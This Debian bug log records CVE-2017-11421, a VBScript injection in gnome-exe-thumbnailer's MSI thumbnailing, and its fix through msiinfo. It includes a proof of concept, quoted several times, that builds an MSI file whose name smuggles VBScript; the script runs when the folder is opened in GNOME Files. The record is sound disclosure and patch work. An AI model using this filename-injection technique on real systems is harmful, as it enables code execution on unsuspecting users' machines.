Debian Bug report logs -
#868705
gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript
Reported by: Nils Dagsson Moskopp <nils+debian-reportbug@dieweltistgarnichtso.net>
Date: Mon, 17 Jul 2017 21:03:02 UTC
Severity: grave
Tags: buster, fixed-upstream, security, sid, stretch
Found in version gnome-exe-thumbnailer/0.9.4-2
Fixed in versions gnome-exe-thumbnailer/0.9.5-1, gnome-exe-thumbnailer/0.9.4-2+deb9u1
Done: James Lu <bitflip3@gmail.com>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, nils+debian-reportbug@dieweltistgarnichtso.net, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>:
Bug#868705; Package gnome-exe-thumbnailer.
(Mon, 17 Jul 2017 21:03:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Nils Dagsson Moskopp <nils+debian-reportbug@dieweltistgarnichtso.net>:
New Bug report received and forwarded. Copy sent to nils+debian-reportbug@dieweltistgarnichtso.net, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>.
(Mon, 17 Jul 2017 21:03:04 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: gnome-exe-thumbnailer
Version: 0.9.4-2
Severity: grave
Tags: security
Justification: user security hole
Dear Maintainer,
the following PoC is copied verbatim from my post about the parsing issue:
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
Proof of Concept
Install Dependencies
On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
Create MSI Files
Create a file named poc.xml with the following content:
<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>
Execute the following Bourne Shell code:
wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
Trigger Execution
Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
*** End of the template - remove these template lines ***
-- System Information:
Debian Release: 9.0
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages gnome-exe-thumbnailer depends on:
ii icoutils 0.31.2-1.1
ii imagemagick 8:6.9.7.4+dfsg-11
ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
ii libglib2.0-bin 2.50.3-2
Versions of packages gnome-exe-thumbnailer recommends:
pn wine <none>
pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
gnome-exe-thumbnailer suggests no packages.
-- no debconf information
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>:
Bug#868705; Package gnome-exe-thumbnailer.
(Tue, 18 Jul 2017 00:06:07 GMT) (full text, mbox, link).
Acknowledgement sent
to James Lu <bitflip3@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>.
(Tue, 18 Jul 2017 00:06:07 GMT) (full text, mbox, link).
Message #10 received at 868705@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi Nils,
I wasn't able to reproduce the exploit on my (64-bit) system with either
Caja and Nautilus (it also required setting up a new wineprefix in
~/.wine). The msi thumbnail ended up generating without any version
information tag at all.
Regardless, I've gone and replaced the VBScript-based parsing entirely
with msitools' msiinfo in
https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
hopefully this should fix the issue. I'll tag a new release soon and
look at pushing the fix to Debian.
(Also CC'ing the other maintainers, who I don't think are on the Debian
Wine list)
Best,
James
On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
> Package: gnome-exe-thumbnailer
> Version: 0.9.4-2
> Severity: grave
> Tags: security
> Justification: user security hole
>
> Dear Maintainer,
>
> the following PoC is copied verbatim from my post about the parsing issue:
> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>
> Proof of Concept
>
> Install Dependencies
>
> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>
> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>
> Create MSI Files
>
> Create a file named poc.xml with the following content:
>
> <?xml version="1.0" encoding="utf-8"?>
> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
> <Product Version="1.0"/>
> </Wix>
>
> Execute the following Bourne Shell code:
>
> wixl -o poc.msi poc.xml
> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>
> Trigger Execution
>
> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>
> *** End of the template - remove these template lines ***
>
>
> -- System Information:
> Debian Release: 9.0
> APT prefers stable
> APT policy: (500, 'stable')
> Architecture: i386 (i686)
>
> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: sysvinit (via /sbin/init)
>
> Versions of packages gnome-exe-thumbnailer depends on:
> ii icoutils 0.31.2-1.1
> ii imagemagick 8:6.9.7.4+dfsg-11
> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
> ii libglib2.0-bin 2.50.3-2
>
> Versions of packages gnome-exe-thumbnailer recommends:
> pn wine <none>
> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>
> gnome-exe-thumbnailer suggests no packages.
>
> -- no debconf information
>
> _______________________________________________
> pkg-wine-party mailing list
> pkg-wine-party@lists.alioth.debian.org
> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
>
[signature.asc (application/pgp-signature, attachment)]
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>:
Bug#868705; Package gnome-exe-thumbnailer.
(Tue, 18 Jul 2017 01:12:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Nils Dagsson Moskopp <nils@dieweltistgarnichtso.net>:
Extra info received and forwarded to list. Copy sent to Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>.
(Tue, 18 Jul 2017 01:12:03 GMT) (full text, mbox, link).
Message #15 received at 868705@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
I like that the patch is less code. Deleted code is debugged code!
Btw, are you sure that using mssiinfo does not introduce new bugs?
Cheers,
Nils
James Lu <bitflip3@gmail.com> writes:
> [ Unknown signature status ]
> Hi Nils,
>
> I wasn't able to reproduce the exploit on my (64-bit) system with either
> Caja and Nautilus (it also required setting up a new wineprefix in
> ~/.wine). The msi thumbnail ended up generating without any version
> information tag at all.
>
> Regardless, I've gone and replaced the VBScript-based parsing entirely
> with msitools' msiinfo in
> https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
> hopefully this should fix the issue. I'll tag a new release soon and
> look at pushing the fix to Debian.
>
> (Also CC'ing the other maintainers, who I don't think are on the Debian
> Wine list)
>
> Best,
> James
>
> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>> Package: gnome-exe-thumbnailer
>> Version: 0.9.4-2
>> Severity: grave
>> Tags: security
>> Justification: user security hole
>>
>> Dear Maintainer,
>>
>> the following PoC is copied verbatim from my post about the parsing issue:
>> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>>
>> Proof of Concept
>>
>> Install Dependencies
>>
>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>>
>> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>>
>> Create MSI Files
>>
>> Create a file named poc.xml with the following content:
>>
>> <?xml version="1.0" encoding="utf-8"?>
>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>> <Product Version="1.0"/>
>> </Wix>
>>
>> Execute the following Bourne Shell code:
>>
>> wixl -o poc.msi poc.xml
>> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>>
>> Trigger Execution
>>
>> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>>
>> *** End of the template - remove these template lines ***
>>
>>
>> -- System Information:
>> Debian Release: 9.0
>> APT prefers stable
>> APT policy: (500, 'stable')
>> Architecture: i386 (i686)
>>
>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>> Shell: /bin/sh linked to /bin/dash
>> Init: sysvinit (via /sbin/init)
>>
>> Versions of packages gnome-exe-thumbnailer depends on:
>> ii icoutils 0.31.2-1.1
>> ii imagemagick 8:6.9.7.4+dfsg-11
>> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
>> ii libglib2.0-bin 2.50.3-2
>>
>> Versions of packages gnome-exe-thumbnailer recommends:
>> pn wine <none>
>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>>
>> gnome-exe-thumbnailer suggests no packages.
>>
>> -- no debconf information
>>
>> _______________________________________________
>> pkg-wine-party mailing list
>> pkg-wine-party@lists.alioth.debian.org
>> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
>>
>
--
Nils Dagsson Moskopp // erlehmann
<http://dieweltistgarnichtso.net>
[signature.asc (application/pgp-signature, inline)]
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>:
Bug#868705; Package gnome-exe-thumbnailer.
(Tue, 18 Jul 2017 01:15:05 GMT) (full text, mbox, link).
Acknowledgement sent
to James Lu <bitflip3@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>.
(Tue, 18 Jul 2017 01:15:05 GMT) (full text, mbox, link).
Message #20 received at 868705@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Control: tag 868705 + pending fixed-upstream
Hi,
msiinfo is part of msitools, just like wixl:
https://github.com/GNOME/msitools. I haven't audited the code, but being
under the GNOME umbrella and having a history of 5 years probably means
that it's reliable enough.
(I've also heard reports so far that msiinfo is a lot /faster/ than
running code through Wine's cscript, which is not really much of a
surprise.)
Best,
James
On 18/07/17 09:02 AM, Nils Dagsson Moskopp wrote:
> I like that the patch is less code. Deleted code is debugged code!
> Btw, are you sure that using mssiinfo does not introduce new bugs?
>
> Cheers,
> Nils
>
> James Lu <bitflip3@gmail.com> writes:
>
>> [ Unknown signature status ]
>> Hi Nils,
>>
>> I wasn't able to reproduce the exploit on my (64-bit) system with either
>> Caja and Nautilus (it also required setting up a new wineprefix in
>> ~/.wine). The msi thumbnail ended up generating without any version
>> information tag at all.
>>
>> Regardless, I've gone and replaced the VBScript-based parsing entirely
>> with msitools' msiinfo in
>> https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
>> hopefully this should fix the issue. I'll tag a new release soon and
>> look at pushing the fix to Debian.
>>
>> (Also CC'ing the other maintainers, who I don't think are on the Debian
>> Wine list)
>>
>> Best,
>> James
>>
>> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>>> Package: gnome-exe-thumbnailer
>>> Version: 0.9.4-2
>>> Severity: grave
>>> Tags: security
>>> Justification: user security hole
>>>
>>> Dear Maintainer,
>>>
>>> the following PoC is copied verbatim from my post about the parsing issue:
>>> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>>>
>>> Proof of Concept
>>>
>>> Install Dependencies
>>>
>>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>>>
>>> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>>>
>>> Create MSI Files
>>>
>>> Create a file named poc.xml with the following content:
>>>
>>> <?xml version="1.0" encoding="utf-8"?>
>>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>>> <Product Version="1.0"/>
>>> </Wix>
>>>
>>> Execute the following Bourne Shell code:
>>>
>>> wixl -o poc.msi poc.xml
>>> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>>>
>>> Trigger Execution
>>>
>>> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>>>
>>> *** End of the template - remove these template lines ***
>>>
>>>
>>> -- System Information:
>>> Debian Release: 9.0
>>> APT prefers stable
>>> APT policy: (500, 'stable')
>>> Architecture: i386 (i686)
>>>
>>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>>> Shell: /bin/sh linked to /bin/dash
>>> Init: sysvinit (via /sbin/init)
>>>
>>> Versions of packages gnome-exe-thumbnailer depends on:
>>> ii icoutils 0.31.2-1.1
>>> ii imagemagick 8:6.9.7.4+dfsg-11
>>> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
>>> ii libglib2.0-bin 2.50.3-2
>>>
>>> Versions of packages gnome-exe-thumbnailer recommends:
>>> pn wine <none>
>>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>>>
>>> gnome-exe-thumbnailer suggests no packages.
>>>
>>> -- no debconf information
>>>
>>> _______________________________________________
>>> pkg-wine-party mailing list
>>> pkg-wine-party@lists.alioth.debian.org
>>> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
>>>
>>
>
[signature.asc (application/pgp-signature, attachment)]
Added tag(s) fixed-upstream and pending.
Request was from James Lu <bitflip3@gmail.com>
to 868705-submit@bugs.debian.org.
(Tue, 18 Jul 2017 01:15:05 GMT) (full text, mbox, link).
Added tag(s) sid, stretch, and buster.
Request was from Laurent Bigonville <bigon@debian.org>
to control@bugs.debian.org.
(Tue, 18 Jul 2017 06:39:05 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>:
Bug#868705; Package gnome-exe-thumbnailer.
(Tue, 18 Jul 2017 18:57:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>.
(Tue, 18 Jul 2017 18:57:03 GMT) (full text, mbox, link).
Message #29 received at 868705@bugs.debian.org (full text, mbox, reply):
Control: retitle -1 gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript
Hi
CVE-2017-11421 has been assigned for this issue.
Regards,
Salvatore
Changed Bug title to 'gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript' from 'gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript'.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 868705-submit@bugs.debian.org.
(Tue, 18 Jul 2017 18:57:03 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>:
Bug#868705; Package gnome-exe-thumbnailer.
(Tue, 18 Jul 2017 19:27:02 GMT) (full text, mbox, link).
Acknowledgement sent
to Stephen Kitt <skitt@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>.
(Tue, 18 Jul 2017 19:27:02 GMT) (full text, mbox, link).
Message #36 received at 868705@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi Salvatore,
On Tue, 18 Jul 2017 20:53:17 +0200, Salvatore Bonaccorso <carnil@debian.org>
wrote:
> CVE-2017-11421 has been assigned for this issue.
Thanks, I’ve added that to the changelog and uploaded the package.
Regards,
Stephen
[Message part 2 (application/pgp-signature, inline)]
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>:
Bug#868705; Package gnome-exe-thumbnailer.
(Tue, 18 Jul 2017 19:45:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Nils Dagsson Moskopp <nils@dieweltistgarnichtso.net>:
Extra info received and forwarded to list. Copy sent to Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>.
(Tue, 18 Jul 2017 19:45:03 GMT) (full text, mbox, link).
Message #41 received at 868705@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Quote <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11421>:
> gnome-exe-thumbnailer before 0.9.5 is prone to a VBScript Injection
> when generating thumbnails for MSI files, aka the "Bad Taste"
> issue. There is a local attack if the victim uses the GNOME Files file
> manager, and navigates to a directory containing a .msi file with
> VBScript code in its filename.
Note that thumbnailer issues could be exploited via drive-by downloads
with any web browser that does not ask users if files should be saved.
Salvatore Bonaccorso <carnil@debian.org> writes:
> Control: retitle -1 gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript
>
> Hi
>
> CVE-2017-11421 has been assigned for this issue.
>
> Regards,
> Salvatore
--
Nils Dagsson Moskopp // erlehmann
<http://dieweltistgarnichtso.net>
[signature.asc (application/pgp-signature, inline)]
Reply sent
to James Lu <bitflip3@gmail.com>:
You have taken responsibility.
(Tue, 18 Jul 2017 19:54:03 GMT) (full text, mbox, link).
Notification sent
to Nils Dagsson Moskopp <nils+debian-reportbug@dieweltistgarnichtso.net>:
Bug acknowledged by developer.
(Tue, 18 Jul 2017 19:54:03 GMT) (full text, mbox, link).
Message #46 received at 868705-close@bugs.debian.org (full text, mbox, reply):
Source: gnome-exe-thumbnailer
Source-Version: 0.9.5-1
We believe that the bug you reported is fixed in the latest version of
gnome-exe-thumbnailer, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 868705@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
James Lu <bitflip3@gmail.com> (supplier of updated gnome-exe-thumbnailer package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Tue, 18 Jul 2017 08:18:48 +0800
Source: gnome-exe-thumbnailer
Binary: gnome-exe-thumbnailer
Architecture: source
Version: 0.9.5-1
Distribution: unstable
Urgency: high
Maintainer: Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>
Changed-By: James Lu <bitflip3@gmail.com>
Description:
gnome-exe-thumbnailer - Wine .exe and other executable thumbnailer for GNOME
Closes: 868705
Changes:
gnome-exe-thumbnailer (0.9.5-1) unstable; urgency=high
.
[ Stephen Kitt ]
* Fix the filename mangling in debian/watch.
.
[ James Lu ]
* New upstream release.
- Switch to msitools' msiinfo for ProductVersion fetching, replacing the
insecure VBScript-based parsing as described at
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
(Closes: #868705; LP: #651610; CVE-2017-11421).
* Add Enhances: caja, tumbler (>= 0.1.92~), nautilus, nemo
These are some of the many file managers/thumbnailer programs that support
desktop thumbnailers like exe-thumbnailer, and I have verified (at some
point) that all of these work.
* fallback-thumbnail-limit.patch: drop, applied upstream.
* Bump Standards-Version to 4.0.0; no changes needed.
* Add msitools to recommends; it is used to fetch .msi version info.
Checksums-Sha1:
4355e1bc808c0390ffc6c049cc0cdd2069ff8835 2071 gnome-exe-thumbnailer_0.9.5-1.dsc
1d72428b14402601d5f7d9962dbf7d1edea14bdc 55246 gnome-exe-thumbnailer_0.9.5.orig.tar.gz
0e507cf2dd41121397e1290bcb3d4fda131e75a3 4688 gnome-exe-thumbnailer_0.9.5-1.debian.tar.xz
bfd6dc806c210373af8be2599a7cf1d14bb459af 5914 gnome-exe-thumbnailer_0.9.5-1_source.buildinfo
Checksums-Sha256:
2159443d583e73503d4183af1f48352ce6c7d360040872486d5c2aff4c7f7e28 2071 gnome-exe-thumbnailer_0.9.5-1.dsc
1b59acf7005bf42aca85a71b08a771dc5b74ce44dca1ef34972a876fb4212e2d 55246 gnome-exe-thumbnailer_0.9.5.orig.tar.gz
eb6d38aa59fde580dddee3b48b81c6e9ed2b51f053c80d75c4e7db5efc1c3159 4688 gnome-exe-thumbnailer_0.9.5-1.debian.tar.xz
643cf586ef581596206e50e61fb4daeafae71987e816ca8fae13f69d43f64d4c 5914 gnome-exe-thumbnailer_0.9.5-1_source.buildinfo
Files:
caea506e039c66cbbdc1546978015b58 2071 gnome optional gnome-exe-thumbnailer_0.9.5-1.dsc
c933062c81fb1d55c7037271db99785a 55246 gnome optional gnome-exe-thumbnailer_0.9.5.orig.tar.gz
9edd8dfdd80b14dcbcc81afde71ea318 4688 gnome optional gnome-exe-thumbnailer_0.9.5-1.debian.tar.xz
d09a9f110dd043d5d7169261ef626daf 5914 gnome optional gnome-exe-thumbnailer_0.9.5-1_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEnPVX/hPLkMoq7x0ggNMC9Yhtg5wFAlluYI0ACgkQgNMC9Yht
g5wBLQ//RWSk7pTwl9SizslpFxQ6nE8VE6JB+eww8HRnoezgXvqK76qAvfc6/17t
iwc+mdmj9gMyEyV8BA2YCzatvkKYLmfNZDFmBEd7pEHPIdB9gIakSpxvdlzW2Z4S
XxyzrAIRP/upOagNg0inZqXeEFSe/SI3389ogvi+NaSffkZ/8B8UHINZ7UKRUc6n
zOvuCocP95O8HLxfEYGG1G7eU+SsNAUtIB9PJD4brUzq0AW2nglxfkxurCdZxBjI
O5GFnq8xvgbbMS/jqHo9DJulDj74p3N3W8+Jiy0px+CelsUJ8dTrF14FZM6gMcjt
Tcyax41Otpu9le+rRAz67qobvGZXZdpnmpAYNed9U078KHy3edYOhNxkW9nKAJ9X
VC6rNbq9QwKvjroJnol3PBJ/EOzLYsIGD0aPnYtLdrHthO4GTfPiE0xvyGwR9KZ/
5ALWEeCowSk77Lx01z4fq34euquNVMhTb6iaNyReIpCVDSmZYL2RBJFbKQP9Ar1v
vk2Nc4j6VhWOtJWXJh+mwdDAKuNM+Ud0gG1fUspcRpU0So61TUAx6EvAYVho5DLF
0r6ufBWd6dni+SOHpwTdlZxUUc0HtIs6x2OGVODiTHNxk3YeNlIzeyLine9iu6dg
2MaQXkUPsqUmJV6JXm1hYr3VEpvseRo/PDm4WdGWlpf6qTFw7bg=
=iYvD
-----END PGP SIGNATURE-----
Reply sent
to James Lu <bitflip3@gmail.com>:
You have taken responsibility.
(Sat, 12 Aug 2017 16:21:36 GMT) (full text, mbox, link).
Notification sent
to Nils Dagsson Moskopp <nils+debian-reportbug@dieweltistgarnichtso.net>:
Bug acknowledged by developer.
(Sat, 12 Aug 2017 16:21:36 GMT) (full text, mbox, link).
Message #51 received at 868705-close@bugs.debian.org (full text, mbox, reply):
Source: gnome-exe-thumbnailer
Source-Version: 0.9.4-2+deb9u1
We believe that the bug you reported is fixed in the latest version of
gnome-exe-thumbnailer, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 868705@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
James Lu <bitflip3@gmail.com> (supplier of updated gnome-exe-thumbnailer package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Tue, 25 Jul 2017 07:28:41 -0700
Source: gnome-exe-thumbnailer
Binary: gnome-exe-thumbnailer
Architecture: source
Version: 0.9.4-2+deb9u1
Distribution: stretch
Urgency: high
Maintainer: Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>
Changed-By: James Lu <bitflip3@gmail.com>
Description:
gnome-exe-thumbnailer - Wine .exe and other executable thumbnailer for GNOME
Closes: 868705
Changes:
gnome-exe-thumbnailer (0.9.4-2+deb9u1) stretch; urgency=high
.
* Add patch switch-to-msiinfo.patch:
- Switch to msitools' msiinfo for ProductVersion fetching, replacing the
insecure VBScript-based parsing as described at
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
(Closes: #868705; LP: #651610; CVE-2017-11421)
* Add msitools to recommends; it is now used to fetch .msi version info.
* Add patch fix-version-label-readability.patch backported from
https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1cf4df81836985d9660f950287232b3255ee17bb
to fix unreadable white-on-white text on version labels.
Checksums-Sha1:
5e7a07883b56197e25bdd3a23e2b66740ff2d508 2099 gnome-exe-thumbnailer_0.9.4-2+deb9u1.dsc
ce5e525d1a614d999c02f220c99d3ee68e9a5111 6096 gnome-exe-thumbnailer_0.9.4-2+deb9u1.debian.tar.xz
57deb3a84ec4ce9486ec8bc24190d412e309c089 6008 gnome-exe-thumbnailer_0.9.4-2+deb9u1_source.buildinfo
Checksums-Sha256:
5999ec0cb78928404927cbe660ee26a6a9cb3b3d0d2b7d89bf2b48bd22385dc7 2099 gnome-exe-thumbnailer_0.9.4-2+deb9u1.dsc
c40e8c596aefd2ef1ffdf6eb08d938fae12b2edc46455cf46fba520bf237e9a6 6096 gnome-exe-thumbnailer_0.9.4-2+deb9u1.debian.tar.xz
297872ee4722ad8e3cecfa21d9e54ed7fc43183854228e6634491792e0b40db1 6008 gnome-exe-thumbnailer_0.9.4-2+deb9u1_source.buildinfo
Files:
1ca70c81c6a39c13ccfcf8370b98baaf 2099 gnome optional gnome-exe-thumbnailer_0.9.4-2+deb9u1.dsc
8410682d3965ab6082aad5673c4a106f 6096 gnome optional gnome-exe-thumbnailer_0.9.4-2+deb9u1.debian.tar.xz
333aa3fd6bf8d5d4d24e9d564bc784c8 6008 gnome optional gnome-exe-thumbnailer_0.9.4-2+deb9u1_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEednFjFDWtapl1TDBdZd4qaNrSU8FAlmKC8UACgkQdZd4qaNr
SU9Kaw/+K8kFXllY8w61T70NSAptBQg9Bn0cYrz4cR2PnLbs0kACuQB9mlJDKs5n
oNobPBj4/uUFx4rpCXAwGOvAhn+rAZR6G7kg/F8aFZJi75dDFxMVGzAewE3gx0L4
TS317qbZpVpPdegQYlPY1UC+AOKefo8Ywh05qQvvqP2pjTzQ7QZQoY8oNa2SXLhR
xK85dUrqcBPAUnFYsZC3Pn+a6dGvy60q1vfUT64L2vngvvXIIiX+1jX7LWUMjRQc
tZ53uwsOguOfjvkfofQCn889+dSd+J9kIDtHVyXlXDxxkY6NV8iBstW+52TXOFeg
baEBY019JQpVit9jPbWJvVy3Pj+Uqj+Me1wbD9W/m5IZ4RVJVuknsUdtpezoEZgf
adwhS4sj+PV1rz1etpk/Z5FUl8D35rVQvYMrBLlzeS3442PgTvHaO0olyawYeFye
dZEH9FPZp3eLTf+kjP2UEy1BggqaDAcBiK6Sxk5376WqsKZjn2LxcWZYcivkAbP9
zm8CS/IYW3ryDPslvCD6ugYOpVm16r8qqxFSAAOZ91hb4MIIm9TFG+VdehWEVK+R
BTcmen4TdZ+nYqlU60A6ERcwG7Let1FwLhfSmv3VjRfH5Qff568R9eIZ/u5688aD
t7HtQgglAtib7pwh4fK+gHKdsm/h4NLtP4J0NneMVq6vUJmPFt8=
=1+jF
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 08 Oct 2017 07:24:50 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 14:34:28 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon